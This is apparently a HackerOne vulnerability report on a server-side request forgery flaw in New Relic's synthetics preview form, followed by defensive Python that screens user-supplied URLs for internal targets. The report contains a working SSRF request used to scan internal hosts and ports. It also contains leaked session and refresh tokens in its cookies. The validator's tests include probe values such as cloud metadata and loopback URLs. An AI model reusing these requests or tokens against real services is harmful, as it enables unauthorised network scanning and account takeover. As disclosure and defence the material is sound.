New Relic: http://newrelic.com SSRF/XSPA

2016-06-23T20:11:10
ID H1:146875
Type hackerone
Reporter grampae
Modified 2016-08-26T23:10:29

Description

A Server Side Request Forgery / Cross Site Port Attack was discovered via a POST request to http://newrelic.com/synthetics_previews, using the test_url parameter within the body of the request.

A Server Side Request Forgery vulnerability allows an attacker to issue remote connections on behalf of the affected server. This can be exploited in order to reach internal systems that are not reachable from the Internet, or to bypass access restrictions.

I have successfully used the following POST request to enumerate live hosts on the 23.235.47.1-254 range, as well as to port scan to determine open and closed ports.

The POST request is as follows:

POST /synthetics_previews HTTP/1.1
Host: newrelic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Referer: https://newrelic.com/synthetics
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 243
Cookie: _ga=GA1.2.1765600361.1464869449; _storefront_z8f3h2_2016_session=8e04fe6989368b093ee1f811d7ce5bde; __qca=P0-136215009-1464869495824; __ar_v4=7QCUSMLEMBHIPPEMTU6A7A%3A20160602%3A1%7CI7ZJI4CQMBCNHGOQ27AYQZ%3A20160602%3A2%7CYCNZVXZ6TJDJ3KMJRVGKFH%3A20160602%3A2%7CDLQZ5QQWIFBZZM5ECJME6X%3A20160602%3A1; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%2294fbf617-d507-4b8f-b2f5-e017b0bc5817%22; optimizelyEndUserId=oeu1464869500423r0.3285744939018391; optimizelySegments=%7B%22171941824%22%3A%22ff%22%2C%22172184284%22%3A%22false%22%2C%22172242367%22%3A%22direct%22%2C%221025373943%22%3A%22none%22%2C%221227391094%22%3A%22Mid%20Market%22%7D; optimizelyBuckets=%7B%7D; _mkto_trk=id:412-MZS-894&token:_mch-newrelic.com-1464869512429-57371; ei_client_id=5750229e8d907b1100a7b88d; hblid=WHYc4cyrO4fPZ1bg4d2T53W3JTAZGU5G; olfsk=olfsk7476185233249074; login_service_login_newrelic_com_tokens=%7B%22token%22%3A%22VfKq5JbpOKhOTtUMCEtGQvX3xAlHQnL%2BQgDCx4BYR4fYa%2FJGuU50ZpktlpeZIYSFH7IqLgsFiF5Us5ahag5eWazizV%2BCHDTq7Of7JD%2F%2BqjPEfGpOZGNo3JJkJFTgs7Jl9rMPlpYIg1dfpH4Hefl7gX1u8sCKnL4lxBMM8LJ%2BGYKkbxrPm%2FseiUgO6pRlToHNK2w%2FVt9OlqWjQm8nbo%2FoLiOMttIY%2Fa9gNvPDKPAT4t57A2TA%2FRN8de1kL0TMbDZM9c0fu0QG8RGz1GLDcCIREDQ6yjsV6eUn1%2BDC%2FfCsnM0veKGKON0LJOSfy8ZMEIvJdgHJJWwHZKW7Tw4%2B92ghpA%3D%3D%22%2C%22refresh_token%22%3A%22e1bTa1aZJEPBbReJbxbKNWPP3Sj0TJJJJ5xTRZ7bH3a45zg6%2F69VoP8zwNJvJyULIq%2FsCkeCd2Gc3VkMlbXoDhe0rCefa7Vvxz5IVIYDYPHYBfSQjxlaMvbln9Lm2theenrXBZNYGskZPZhx9ZLW6mLUKwOG1wS18VqN5DYLL3MJUbzsWeXvVSWE5Rl2c7RdIHVW8%2BffFZs2ycU3SV4BEiXOZgiCYgMF%2Fq08VYXDtB0FqbNmxf7vWiUylydmtKQWGcfKsD2%2BFQLA4ZEpCI%2BG%2Bvb1toUrfpepQKPO8%2BRBk6XWgBUHplEp4lvWeJpq%2BtilXuhasGzY%2FhO6Z3%2FJD5w%2F9A%3D%3D%22%7D; syn_preview_count=BAhpCg%3D%3D--ceb27632ec3515dcaa43ec547fe5cb3389471630; __distillery=945b524_9329f52f-4f70-4e70-accf-2b7f38370b05-fdd900df1-67520459572c-da4f

utf8=%E2%9C%93&authenticity_token=c52RXD%2BUQjWr2OIMeD%2BRZ4WSH%2B7CXwAzokUuNwU1JY0%3D&synthetics_preview%5Btest_url%5D=www.yahoo.com&synthetics_preview%5Bemail%5D=admin%40yahoo.com&synthetics_preview%5Bdb_fields%5D=%7B%7D&commit=Run+Free+Test

In testing for this vulnerability I used the program "OWASP Skanda"; however, it would be trivial to replace the value of test_url with 127.0.0.1:80 or whichever URL you are trying to enumerate.

I realize that this is a function to show uptime for any URL a visitor specifies; however, hopefully it could be limited to a specific scope to deter repeated requests.

Thanks!
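The report suggests limiting the test_url feature to a specific scope. As an added example (not part of grampae's report and not New Relic's code), the following Python shows what a server-side target check for such a "test this URL" form could look like: it accepts only http(s), only ports 80/443, resolves the hostname, and rejects any answer that is not a globally routable address (loopback, RFC 1918, link-local such as 169.254.169.254, IPv4-mapped IPv6 forms of those). The function names, the allowed-port policy and the stub resolver table are assumptions made for this example; the resolver is injectable so the policy can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical policy for a public "check uptime of a URL" feature:
# only http(s) to well-known web ports on publicly routable addresses.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def dns_resolve(host):
    """Default resolver: all A/AAAA answers for host (performs a real DNS lookup)."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def check_target(url, resolve=dns_resolve):
    """Validate a user-supplied test_url value.

    Returns (ok, reason, addrs). On success, addrs holds the vetted IP
    addresses; the fetcher should connect to one of those and send the
    original hostname in the Host header, rather than re-resolving the
    name (a second lookup could be rebound to an internal address).
    """
    if "://" not in url:
        url = "http://" + url  # the form accepts bare hosts such as www.yahoo.com
    parts = urlsplit(url)

    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme, []
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL not allowed", []
    host = parts.hostname
    if not host:
        return False, "missing host", []
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        return False, "invalid port", []
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port, []

    # IP literals (incl. bracketed IPv6) are taken as-is; names go through DNS.
    try:
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            addrs = resolve(host)
        except (socket.gaierror, OSError):
            return False, "host %r does not resolve" % host, []
    if not addrs:
        return False, "host %r has no addresses" % host, []

    for a in addrs:
        ip = ipaddress.ip_address(a)
        # Unwrap ::ffff:a.b.c.d so the IPv4 rules apply to mapped addresses too.
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        # is_global is False for loopback, private, link-local, CGNAT,
        # documentation ranges and unspecified addresses.
        if not ip.is_global:
            return False, "%r resolves to non-public address %s" % (host, a), []
    return True, "ok", addrs


# Constructed resolver table for offline use; the addresses are made up.
_STUB_TABLE = {
    "www.yahoo.com": ["98.137.11.163"],
    "intranet.corp.example": ["10.0.0.5"],
    "dual.example": ["198.51.100.7", "192.168.1.20"],  # one public, one private
}


def stub_resolve(host):
    """Offline resolver over the constructed table; unknown names fail like NXDOMAIN."""
    if host in _STUB_TABLE:
        return _STUB_TABLE[host]
    raise socket.gaierror(socket.EAI_NONAME, "Name or service not known")


if __name__ == "__main__":
    for candidate in ("www.yahoo.com", "127.0.0.1:80", "http://169.254.169.254/latest/meta-data/",
                      "http://[::ffff:127.0.0.1]/", "http://www.yahoo.com:8080/",
                      "ftp://www.yahoo.com/", "http://intranet.corp.example/"):
        print(candidate, "->", check_target(candidate, stub_resolve)[:2])
```

Because every resolved answer must pass, a name that returns a mix of public and private addresses is rejected; that also closes the obvious way around a check that only inspects the first answer. Host-level rate limiting of the form, which the report also asks for, is separate from this check and not shown here.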